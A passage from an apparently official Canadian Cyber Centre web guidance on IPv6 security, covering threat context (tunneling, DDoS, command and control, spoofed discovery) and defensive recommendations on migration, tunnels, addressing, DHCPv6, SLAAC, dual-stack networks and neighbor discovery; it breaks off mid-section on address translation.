text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="1.4">1.4 Threat context</h3> <p>This guidance is intended for systems operating at the UNCLASSIFIED, PROTECTED A, and PROTECTED B levels. In general, the Cyber Centre recommends that GC departments and agencies conduct a threat and risk assessment within the context of their business needs before partial or full-scale adoption of <abbr title="Internet Protocol version 6">IPv6</abbr>. As organizations consider threat sources that may exploit <abbr title="Internet Protocol version 6">IPv6</abbr> vulnerabilities, the Cyber Centre assesses that unsophisticated threat actors (Td3) may target device misconfiguration errors and unintentionally exposed devices to infiltrate networks and maximize their criminal operations. Cybercrime groups and financially motivated cyber threat actors (Td4 and Td5) may target <abbr title="Internet Protocol version 6">IPv6</abbr>-related device vulnerabilities and design implementation weaknesses<sup id="fn3-rf"><a class="fn-lnk" href="#fn3"><span class="wb-inv">Footnote </span>3</a></sup>. State-sponsored actors (Td6 and above), in addition to lower-level tactics, may target IPv6 protocol specification weaknesses and system integration vulnerabilities to achieve larger strategic objectives. Mitigations to address state-sponsored advanced threats are considered out of scope for this guidance.</p> <p>Below are some identified potential threat events (attacks) that could be applicable within <abbr title="Internet Protocol version 6">IPv6</abbr> environments:</p> <h4 id="1.4.1">1.4.1 Protocol tunneling</h4> <p>Threat actors may encapsulate network packets within another protocol or create multiple tunnels through a network device to evade detection controls. For example, network devices may allow a malicious actor to embed unauthorized <abbr title="Internet Protocol version 6">IPv6</abbr> packets within <abbr title="Internet Protocol version 4">IPv4</abbr> tunnels to evade or bypass network filtering controls. Additionally, threat actors may launch spoofing attacks utilizing tunnel injection techniques, i.e. where a threat actor forges a valid encapsulated packet (based on partial knowledge of the tunnel endpoints and the encapsulation protocol)<sup id="fn4-rf"><a class="fn-lnk" href="#fn4"><span class="wb-inv">Footnote </span>4</a></sup>.</p> <h4 id="1.4.2">1.4.2 Distributed denial-of-service attacks</h4> <p>Threat actors may utilize <abbr title="Internet Protocol version 6">IPv6</abbr> protocol capabilities such as multicast messages or extension headers to launch distributed denial-of-service (DDoS) attacks to overwhelm network defence systems. For example, a threat actor can use spoofed <abbr title="Internet Protocol version 6">IPv6</abbr> link-layer multicast messages to launch a denial-of-service attack on a target source address.</p> <h4 id="1.4.3">1.4.3 Command and control</h4> <p>Threat actors may leverage <abbr title="Internet Protocol version 6">IPv6</abbr> enhancements (extension headers or others) to embed and communicate control signals or beacons through a compromised network. Globally accessible and larger address space blocks make <abbr title="Internet Protocol version 6">IPv6</abbr> attractive for threat actors to deploy command and control channels.</p> <h4 id="1.4.4">1.4.4 Network device misconfigurations</h4> <p>Threat actors may exploit network device misconfigurations or inconsistencies when perimeter gateway access control filters are not properly implemented. Threat actors may exploit network devices which expose unconfigured <abbr title="Internet Protocol version 6">IPv6</abbr> interfaces by default to bypass network security controls.</p> <h4 id="1.4.5">1.4.5 Network service discovery</h4> <p><abbr title="Internet Protocol version 6">IPv6</abbr> multicast service discovery messages (e.g. multicast DNS (mDNS)<sup id="fn5-rf"><a class="fn-lnk" href="#fn5"><span class="wb-inv">Footnote </span>5</a></sup> or Link-Local Multicast Name Resolution (LLMNR)<sup id="fn6-rf"><a class="fn-lnk" href="#fn6"><span class="wb-inv">Footnote </span>6</a></sup>) can be spoofed or crafted to redirect endpoints to an attacker-controlled infrastructure. Also, threat actors may leverage <abbr title="Internet Protocol version 6">IPv6</abbr>’s default protocol capabilities (such as Neighbor Discovery) to support reconnaissance operations (for example, extracting sensitive network device information) which can then be used to target vulnerabilities.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h2 class="mrgn-tp-xl text-info" id="2">2 Security considerations</h2> <p>The security model required for enterprise network architectures to support IPv6-enabled devices is different from traditional <abbr title="Internet Protocol version 4">IPv4</abbr> implementations. This section highlights cyber security considerations and recommended actions to mitigate risks associated with the use of <abbr title="Internet Protocol version 6">IPv6</abbr> within an enterprise network. <abbr title="Internet Protocol version 6">IPv6</abbr> transition plans must consider the impact on business services and the organization’s security posture.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.1">2.1 Migration risks</h3> <p>Enabling <abbr title="Internet Protocol version 6">IPv6</abbr> alters an organization’s network communications and security monitoring requirements. Accordingly, a systematic approach considering transition plans, interoperability risks and future operational requirements is highly recommended. Organizations may have both <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr> deployed over their transition period. As such, it is crucial to consider whether existing network security infrastructures can support <abbr title="Internet Protocol version 6">IPv6</abbr>. Management must ensure that <abbr title="Internet Protocol version 6">IPv6</abbr> transition plans adhere to change management processes. Security program policies and procedures at the organization level may require updates as necessary.</p> <p>Management should identify the target objective, transition timelines, and migration paths. Security control policies that manage audit and monitoring, interconnection requirements, device identification and authentication, boundary protection, and managed interfaces may require updates. In general, the Cyber Centre recommends using the risk management framework detailed in <a href="https://www.cyber.gc.ca/en/guidance/it-security-risk-management-lifecycle-approach-itsg-33">IT security risk management: A lifecycle approach (ITSG-33)</a> to identify and manage related information system security risks.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.2">2.2 Procurement and testing</h3> <p><abbr title="Internet Protocol version 6">IPv6</abbr> transition and implementation plans must be aligned with the organization’s procurement strategy. Procurement of assets with networking functions should be assessed for <abbr title="Internet Protocol version 6">IPv6</abbr> support. The National Institute of Standards and Technology (NIST) and the University of New Hampshire (UNH) InterOperability Laboratory have developed an assessment and testing program that can assist with functional evaluation of <abbr title="Internet Protocol version 6">IPv6</abbr> products. This program maintains a product registry of <abbr title="Internet Protocol version 6">IPv6</abbr> devices and applications that have been tested against the technical requirements of the United States Government <abbr title="Internet Protocol version 6">IPv6</abbr> standards profile (USGv6-r1 Profile)<sup id="fn7-rf"><a class="fn-lnk" href="#fn7"><span class="wb-inv">Footnote </span>7</a></sup> for performance and conformance. The Cyber Centre recommends that organizations consider products on the <abbr title="United States Government IPv6">USGv6</abbr> program registry as part of their procurement strategy. Organizations should review a product’s Supplier Declaration of Conformity (SDoC), which documents <abbr title="Internet Protocol version 6">IPv6</abbr> capability claims. Additionally, organizations should test the network infrastructure’s capability to support <abbr title="Internet Protocol version 6">IPv6</abbr>-only deployment scenarios.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.3">2.3 Target architecture</h3> <p>The target architecture for the adoption of <abbr title="Internet Protocol version 6">IPv6</abbr> must fall within an acceptable level of residual risk (risk tolerance) for the organization. The Cyber Centre recommends a target architecture plan that ultimately leads to an <abbr title="Internet Protocol version 6">IPv6</abbr>-only network infrastructure end-state. While dual-stack architectures (<abbr title="Internet Protocol version 4">IPv4</abbr>/<abbr title="Internet Protocol version 6">IPv6</abbr>) might be an obvious transition choice, the Cyber Centre recommends designing the transition plan with the goal of an <abbr title="Internet Protocol version 6">IPv6</abbr>-only end-state architecture. A single-stack (<abbr title="Internet Protocol version 6">IPv6</abbr>-only) end-state architecture simplifies network management and security monitoring, as well as a reduction in the overall operational costs.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.4">2.4 Legacy applications</h3> <p>Legacy applications may lack native support for <abbr title="Internet Protocol version 6">IPv6</abbr>, making them incapable of processing <abbr title="Internet Protocol version 6">IPv6</abbr> packet data. This can be particularly complicated with critical business applications with no mechanisms to support <abbr title="Internet Protocol version 6">IPv6</abbr>. When <abbr title="Internet Protocol version 6">IPv6</abbr> is enabled, legacy applications or security controls that rely on hard-coded <abbr title="Internet Protocol version 4">IPv4</abbr> addresses as hostnames may be impacted. If adequate traffic translation mechanisms are not implemented, <abbr title="Internet Protocol version 6">IPv6</abbr>-only endpoints may be prevented from connecting to services that are only <abbr title="Internet Protocol version 4">IPv4</abbr>-aware and vice-versa. The Cyber Centre recommends that organizations assess the impact of their transition plans on their software applications.</p> <p>The <a href="https://datatracker.ietf.org/doc/html/rfc8305">Happy Eyeballs Version 2: Better Connectivity Using Concurrency algorithm</a><sup id="fn8-rf"><a class="fn-lnk" href="#fn8"><span class="wb-inv">Footnote </span>8</a></sup> is an <abbr title="Internet Engineering Task Force">IETF</abbr>-proposed standard for managing how system applications can initiate and process asynchronous Domain Name System (DNS) queries on dual-stack hosts. The algorithm allows web applications to switch seamlessly between <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr> networks. Network administrators should therefore test business applications for <abbr title="Internet Protocol version 6">IPv6</abbr>-based capabilities. While the Happy Eyeballs algorithm offers the benefit of managing switches between <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr>, it may also mask network problems. Hence, successfully connecting to an application may not be an indication of a clean bill of health on the <abbr title="Internet Protocol version 4">IPv4</abbr> or <abbr title="Internet Protocol version 6">IPv6</abbr> networks in a dual-stack environment.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.5">2.5 Unauthorized tunnels</h3> <p>Organizations should implement network security controls to detect and block the use of unauthorized <abbr title="Internet Protocol version 6">IPv6</abbr> transition tunnels. Transition tunnels are techniques used to transport <abbr title="Internet Protocol version 6">IPv6</abbr> packets over <abbr title="Internet Protocol version 4">IPv4</abbr> network infrastructure. <abbr title="Internet Protocol version 6">IPv6</abbr> tunnels can be manual or automatic tunnels, such as those provided by Teredo, 6to4<sup id="fn9-rf"><a class="fn-lnk" href="#fn9"><span class="wb-inv">Footnote </span>9</a></sup>, or Intra-Site Automatic Tunnel Addressing Protocol (ISATAP)<sup id="fn10-rf"><a class="fn-lnk" href="#fn10"><span class="wb-inv">Footnote </span>10</a></sup>. Teredo is an automatic tunneling protocol designed by Microsoft, and it uses User Datagram Protocol (UDP) to tunnel <abbr title="Internet Protocol version 6">IPv6</abbr> packets over <abbr title="Internet Protocol version 4">IPv4</abbr> networks. The <abbr title="Internet Engineering Task Force">IETF</abbr> designed “6to4” to provide automatic <abbr title="Internet Protocol version 6">IPv6</abbr>-over-<abbr title="Internet Protocol version 4">IPv4</abbr> tunneling to interconnect <abbr title="Internet Protocol version 6">IPv6</abbr> networks, while ISATAP is used to transmit <abbr title="Internet Protocol version 6">IPv6</abbr> packets between dual-stack nodes on an <abbr title="Internet Protocol version 4">IPv4</abbr> network. While these techniques and protocols may offer benefits, particularly during the transition phase, transporting <abbr title="Internet Protocol version 6">IPv6</abbr> packets over <abbr title="Internet Protocol version 4">IPv4</abbr> infrastructure can have security implications. These tunneling applications can be used to bypass network filtering policies. Organizations should implement mechanisms to block the use of default, automatic tunnels on end-user and perimeter devices (firewalls and edge routers). The Cyber Centre recommends using tunnel-aware security solutions. On network edge devices such as firewalls, organizations should deny by default all <abbr title="User Datagram Protocol">UDP</abbr> outbound traffic and implement exceptions for authorized services only<sup id="fn11-rf"><a class="fn-lnk" href="#fn11"><span class="wb-inv">Footnote </span>11</a></sup>.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.6">2.6 Default configurations</h3> <p>Modern operating systems (OS) and network devices will most likely support <abbr title="Internet Protocol version 6">IPv6</abbr> and, due to the standard’s requirements, this may be enabled by default. In addition, critical system functions may also require <abbr title="Internet Protocol version 6">IPv6</abbr> to be enabled. For example, Microsoft does not recommend disabling <abbr title="Internet Protocol version 6">IPv6</abbr> support on Windows <abbr title="Operating System">OS</abbr> devices, even when not in use <span class="nowrap"><sup id="fn5a-rf"><a class="fn-lnk" href="#fn5"><span class="wb-inv">Footnote </span>5</a></sup></span>. To understand and assess related risks, organizations should proactively review the default status of <abbr title="Internet Protocol version 6">IPv6</abbr> on their devices. Stay aware of risks associated with default configurations and design monitoring and preventative controls to mitigate those risks. For example, the 6to4 tunneling protocol is enabled by default on Windows servers when an interface is assigned a public <abbr title="Internet Protocol version 4">IPv4</abbr> address. The tunnel assigns and dynamically registers an <abbr title="Internet Protocol version 6">IPv6</abbr> address on the network<span class="nowrap"><sup id="fn12-rf"><a class="fn-lnk" href="#fn12"><span class="wb-inv">Footnote </span>12</a></sup></span>. If not monitored, this exposes the network to considerable risks. Organizations should implement mechanisms to drop unauthorized <abbr title="Internet Protocol version 6">IPv6</abbr> traffic flows. To mitigate threats associated with <abbr title="Internet Protocol version 6">IPv6</abbr> traffic transiting the network undetected, the Cyber Centre recommends proactive host-based monitoring for <abbr title="Internet Protocol version 6">IPv6</abbr> network communications, even when the network interface is disabled. Detection of unauthorized network traffic should be investigated.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.7">2.7 Unauthorized Internet Protocol version 6 traffic flows</h3> <p>Lack of visibility into <abbr title="Internet Protocol version 6">IPv6</abbr> traffic flows represents a considerable risk on the network. Organizations with no approved use for <abbr title="Internet Protocol version 6">IPv6</abbr> traffic should ensure <abbr title="Internet Protocol version 6">IPv6</abbr> traffic flows are filtered on network edge routers and firewalls according to their network policies. A network that has deployed <abbr title="Internet Protocol version 6">IPv6</abbr> should only allow <abbr title="Internet Protocol version 6">IPv6</abbr> traffic that is permitted by policy, with access control lists (ACL) allowing only authorized flows and protocols and blocking all others by default. When IPv6 is being deployed, depending on the business case, a threat and risk assessment (TRA) may be required to identify and mitigate associated risks. In some cases, it may be infeasible to fully disable IPv6 functionality even with no business use case. For example, Microsoft does not recommend disabling <abbr title="Internet Protocol version 6">IPv6</abbr> on Windows as some components require it to function properly. The Cyber Centre recommends a risk assessment to identify operational and security protections that could mitigate associated risks. In general, we recommend disabling <abbr title="Internet Protocol version 6">IPv6</abbr> except where there is an approved operational need for its use on the enterprise network <sup id="fn5b-rf"><a class="fn-lnk" href="#fn5"><span class="wb-inv">Footnote </span>5</a></sup>.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.8">2.8 Monitoring and management tools</h3> <p>Network management and monitoring tools require substantial updates to manage and support <abbr title="Internet Protocol version 6">IPv6</abbr> network traffic. Network security monitoring and reporting tools, such as an intrusion detection and prevention system (IDPS), log aggregation (via a security information and event management (SIEM) system), vulnerability scanners, and patch management tools, must support <abbr title="Internet Protocol version 6">IPv6</abbr> protocols to ensure ongoing compliance with organizational security policies. The Cyber Centre recommends that organizations prioritize testing for different network monitoring scenarios (dual-stack and <abbr title="Internet Protocol version 6">IPv6</abbr>-only) as part of their <abbr title="Internet Protocol version 6">IPv6</abbr> transition strategy. In addition, tailored test cases should be developed to validate support for <abbr title="Internet Protocol version 6">IPv6</abbr> for software and business service development-related activities.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.9">2.9 Addressing scheme</h3> <p>A robust <abbr title="Internet Protocol version 6">IPv6</abbr> addressing scheme increases the security of the network, while providing the flexibility to support business services and mitigate information leakage threats. Organizations should consider their network’s current state architecture as well as future needs when selecting an <abbr title="Internet Protocol version 6">IPv6</abbr> addressing plan. Considering the sophistication and interdependencies of modern networks and applications, an addressing plan which supports a phased and incremental approach to <abbr title="Internet Protocol version 6">IPv6</abbr> is recommended. An IP address management (IPAM) system is essential for effectively managing the addressing plan. Organizations should consider supported business applications and security policies when selecting an addressing scheme. The addressing plan can also be used to enhance an organization’s security posture, as a foundational means for separating networks, while enforcing the zero-trust principles of network segmentation and segregation. If considering Unique Local Addresses (ULAs), they must be generated following approved pseudorandom algorithms and should be filtered at the network boundaries and not exposed beyond the internal network. While <abbr title="Unique Local Addresses">ULA</abbr>s offer some benefits in <abbr title="Internet Protocol version 6">IPv6</abbr> deployments, we would not recommend their use in dual-stack environments. For <abbr title="Unique Local Addresses">ULA</abbr>s to be effective in dual-stack deployments, the address selection policy table precedence and label values may need to be updated on all devices on the network, introducing additional operational complexities and complicating network management and security processes.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.10">2.10 Multi-addressing support</h3> <p>A single <abbr title="Internet Protocol version 6">IPv6</abbr> interface can hold multiple addresses<sup id="fn13-rf"><a class="fn-lnk" href="#fn13"><span class="wb-inv">Footnote </span>13</a></sup>. For example, an interface loopback address, a link local address, a unique local address, or a globally routable address. By default, a network interface with <abbr title="Internet Protocol version 6">IPv6</abbr> is assigned a link local address. Multiple addresses offer both security and operational benefits; however, this can make it difficult to enforce network monitoring and filtering policies, particularly if filtering policies are not robust enough. This represents an increased threat surface and may allow threat actors to evade network traffic detection rules. The Cyber Centre recommends that system administrators implement restrictions on unauthorized changes to <abbr title="Internet Protocol version 6">IPv6</abbr> addresses and ensure that monitoring controls are in place to prevent and detect changes. To mitigate the threat of malicious actors evading network security policies, implement deny-by-default policies to ensure traffic to and from an interface is blocked on network boundaries except for traffic that is explicitly allowed by the organization’s network security policies.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.11">2.11 Dynamic Host Configuration Protocol for Internet Protocol version 6</h3> <p>Most enterprise networks rely on Dynamic Host Configuration Protocol (DHCP) for distributing <abbr title="Internet Protocol">IP</abbr> addressing information across the network. For <abbr title="Internet Protocol version 6">IPv6</abbr>, DHCP version 6 (DHCPv6)<sup id="fn14-rf"><a class="fn-lnk" href="#fn14"><span class="wb-inv">Footnote </span>14</a></sup> supports both stateless and stateful addressing for network devices. Like the traditional <abbr title="Dynamic Host Configuration Protocol">DHCP</abbr> protocol, <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> is susceptible to a variety of attacks such as malicious intercept, spoofing, and <abbr title="Distributed Denial-of-Service">DDoS</abbr> attacks. For enterprise networks deploying <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr>, the Cyber Centre recommends protecting DHCP network messages by using <abbr title="Internet Protocol Security">IPsec</abbr> with encryption <sup id="fn6a-rf"><a class="fn-lnk" href="#fn6"><span class="wb-inv">Footnote </span>6</a></sup>. The Cyber Centre further recommends enabling authentication mechanisms between the <abbr title="Dynamic Host Configuration Protocol">DHCP</abbr> servers, relay hosts, and client endpoints. Organizations should also implement additional protections such as <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> Guard<sup id="fn15-rf"><a class="fn-lnk" href="#fn15"><span class="wb-inv">Footnote </span>15</a></sup> to block malicious <abbr title="Dynamic Host Configuration Protocol">DHCP</abbr> reply and advertisement messages from unauthorized network devices. Organizations should consider <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> failover<sup id="fn16-rf"><a class="fn-lnk" href="#fn16"><span class="wb-inv">Footnote </span>16</a></sup> capabilities to provide high-availability and protect against denial-of-service (DoS) attacks.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.12">2.12 Address autoconfiguration protections</h3> <p>The <abbr title="Internet Protocol version 6">IPv6</abbr> protocol specification allows devices to self-assign network addresses (i.e., interface identifiers (IIDs)) using the Stateless Address Autoconfiguration (SLAAC) protocol. As outlined in <a href="https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-119.pdf">NIST SP 800-119 Guidelines for the secure deployment of IPv6 (PDF)</a>, <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr> relies on network information received from the router and the device <abbr title="Media Access Control">MAC</abbr> address and can allow threat actors to track <abbr title="Internet Protocol version 6">IPv6</abbr> endpoints. The Cyber Centre recommends disabling the use of <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr>, particularly if a public addressing model is implemented. However, if an approved use case exists for <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr>, the Cyber Centre recommends enabling <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr> privacy extensions (which generate temporary <abbr title="Internet Protocol version 6">IPv6</abbr> addresses) for external communications outside the enterprise network (for example, with the Internet or third-party networks). Enabling <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> temporary addressing can also provide the same protections as <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr> privacy extensions. Please note that certain endpoints may not support <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr>, such as devices running on the Android OS, and may require self-configured <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr> addressing as their only autoconfiguration option. In those scenarios, organizations should enable <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> Address Registration as a mechanism for <abbr title="Stateless Address Autoconfiguration">SLAAC</abbr> devices to inform the <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> server<sup id="fn17-rf"><a class="fn-lnk" href="#fn17"><span class="wb-inv">Footnote </span>17</a></sup> of the address they self-generated. However, note that this may not provide visibility into auto-configured devices that don’t support address registration or maliciously choose not to inform the <abbr title="Dynamic Host Configuration Protocol version 6">DHCPv6</abbr> server. Organizations should implement network security controls to identify, manage and authorize network links with autoconfigured addresses.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.13">2.13 Dual-stack environments</h3> <p>Dual stacking is a cost-attractive proposition for organizations, allowing the use of existing <abbr title="Internet Protocol version 4">IPv4</abbr> infrastructure alongside <abbr title="Internet Protocol version 6">IPv6</abbr>. However, the need to maintain the <abbr title="Internet Protocol version 4">IPv4</abbr> infrastructure while onboarding new <abbr title="Internet Protocol version 6">IPv6</abbr> networks can increase the management burden and the attack surface. Dual-stack networks pose additional security concerns due to the use of multiple <abbr title="Internet Protocol">IP</abbr> stacks, which increases the attack surface and requires additional security controls to mitigate associated risks. Dual-stacked host endpoints in particular present higher security challenges. Endpoint controls must have addressing controls for both <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr> addressing schemes, which introduces additional complexity. The Cyber Centre recommends that organizations consider restricting host endpoints to single <abbr title="Internet Protocol">IP</abbr> stack solutions (<abbr title="Internet Protocol version 4">IPv4</abbr>-only or <abbr title="Internet Protocol version 6">IPv6</abbr>-only). Limiting dual-stack architectures to transition mechanisms, switches, routers, or network gateways will help reduce the attack surface. Organizations should ensure that network or application firewalls are aware of and capable of filtering both <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr> network packets.</p> <p>The <abbr title="Internet Protocol version 6">IPv6</abbr> specification standard establishes precedence rules which govern dual-stack interfaces. According to the <abbr title="Internet Engineering Task Force">IETF</abbr>’s request for comments (RFC) 6724 publication, <a href="https://www.rfc-editor.org/rfc/rfc6724">default address selection for Internet Protocol Version 6</a>, configured default policies may prioritize specific address groups over others, thereby leading to network operational complexities. This can have operational and security implications within dual-stack networks. Network and security administrators should be aware of address-selection precedence values deployed within their network environment. Administrators should also review and approve address-selection policies and ensure they are aligned with their network security objectives. Network security devices, including firewalls, edge routers, and gateways, should implement filtering policies to prevent unauthorized inbound or outbound <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr> traffic.</p> <p>In dual-stack <abbr title="Domain Name System">DNS</abbr> environments, A records (used to map domain names to <abbr title="Internet Protocol version 4">IPv4</abbr> addresses) and AAAA records (used to map domain names to <abbr title="Internet Protocol version 6">IPv6</abbr> addresses) are crucial for maintaining services. For Internet-exposed networks, the Cyber Centre recommends that organizations use separate <abbr title="Domain Name System">DNS</abbr> infrastructure for internal and external <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr> networks (also known as split <abbr title="Domain Name System">DNS</abbr> architecture). This is to ensure the stability of system applications, increase security, and preserve the privacy of enterprise network data. For more information on split DNS architecture, read the <abbr title="National Security Agency">NSA</abbr>’s <a href="https://www.nsa.gov/press-room/news-highlights/article/article/3270451/nsa-publishes-internet-protocol-version-6-ipv6-security-guidance/">Internet Protocol Version 6 Security Guidance</a>.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.14">2.14 Protection of data and management planes</h3> <p>Network administrative communications for <abbr title="Internet Protocol version 6">IPv6</abbr> environments should be protected against eavesdropping, sniffing, and similar threats. The Cyber Centre recommends separating the management plane from the data plane using mechanisms such as virtual local area network (VLAN) separation or firewall filtering. <abbr title="access control lists">ACL</abbr>s, Intrusion Prevention Systems (IPS), and layer-2 filtering should also be used to protect the network management plane devices. For higher sensitivity networks, physical and cryptographic separation is highly recommended, for example, separation of management and data planes. The Cyber Centre further recommends that organizations use <abbr title="Internet Protocol Security">IPsec</abbr> to protect <abbr title="Internet Protocol version 6">IPv6</abbr> communications. Only CSE-approved cryptographic algorithms should be used, as indicated in the Cyber Centre’s publication <a href="https://www.cyber.gc.ca/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B information (ITSP.40.111)</a>. Control plane protocols for <abbr title="Internet Protocol version 6">IPv6</abbr> networks include <abbr title="Neighbor Discovery">ND</abbr>, <abbr title="Dynamic Host Configuration Protocol">DHCP</abbr>, Border Gateway Protocol (BGP), Network Time Protocol (NTP), and others. Organizations should consider implementing network filtering security controls. These controls will prevent control plane messages from inadvertently leaking information and disable or block unauthorized control plane protocols.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.15">2.15 Neighbor discovery messages</h3> <p>Neighbor discovery (ND)<sup id="fn18-rf"><a class="fn-lnk" href="#fn18"><span class="wb-inv">Footnote </span>18</a></sup> in the <abbr title="Internet Protocol version 6">IPv6</abbr> specification is similar to the Address Resolution Protocol (ARP) used by <abbr title="Internet Protocol version 4">IPv4</abbr>. <abbr title="Neighbor Discovery">ND</abbr> is used to manage crucial <abbr title="Internet Protocol version 6">IPv6</abbr> capabilities such as address autoconfiguration, address resolution, duplicate address detection and others. However, the <abbr title="Neighbor Discovery">ND</abbr> protocol is susceptible to several attacks<sup id="fn19-rf"><a class="fn-lnk" href="#fn19"><span class="wb-inv">Footnote </span>19</a></sup> and can also be used by threat actors to perform address spoofing or poisoning attacks. The Cyber Centre recommends implementing network products which support cryptographic protections for <abbr title="Neighbor Discovery">ND</abbr> such as Secure Neighbor Discovery (SEND)^Q. Cryptographic signatures generated through <abbr title="Secure Neighbor Discovery">SEND</abbr> are used to validate and verify <abbr title="Neighbor Discovery">ND</abbr> messages, protecting against address spoofing attacks. Enabling <abbr title="Internet Protocol Security">IPsec</abbr> can help secure <abbr title="Neighbor Discovery">ND</abbr> messages. It is also advisable to filter <abbr title="Neighbor Discovery">ND</abbr> messages (i.e., Internet Control Message Protocol version 6 (ICMPv6)) on external network boundary gateways except those required for <abbr title="Internet Protocol version 6">IPv6</abbr> network connectivity. Please refer to RFC 4890<sup id="fn20-rf"><a class="fn-lnk" href="#fn20"><span class="wb-inv">Footnote </span>20</a></sup> for guidance on filtering <abbr title="Internet Control Message Protocol version 6">ICMPv6</abbr> messages in firewalls.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.16">2.16 Address translation risks</h3> <p>Address translation and tunneling of <abbr title="Internet Protocol version 4">IPv4</abbr> over <abbr title="Internet Protocol version 6">IPv6</abbr> and vice versa can introduce additional risk concerns. Translation devices can be a single point of failure and therefore high-availability and redundancy protections should be included as part of their architecture whenever they are deployed. Translation interfaces also force the termination of security mechanisms such as IPsec and Domain Name System Security Extensions (DNSSEC).</p> <p>Network Address Translation-Protocol Translation (NAT-PT)<sup id="fn21-rf"><a class="fn-lnk" href="#fn21"><span class="wb-inv">Footnote </span>21</a></sup> is a common translation mechanism that allows <abbr title="Internet Protocol version 4">IPv4</abbr>-only devices to communicate with <abbr title="Internet Protocol version 6">IPv6</abbr>-only devices. The Cyber Centre does not recommend using NAT-PT to communicate between <abbr title="Internet Protocol version 6">IPv6</abbr>-only networks via an <abbr title="Internet Protocol version 4">IPv4</abbr> backbone or vice versa because of availability and end-to-end security concerns. Organizations can consider NAT64 (Stateful<sup id="fn22-rf"><a class="fn-lnk" href="#fn22"><span 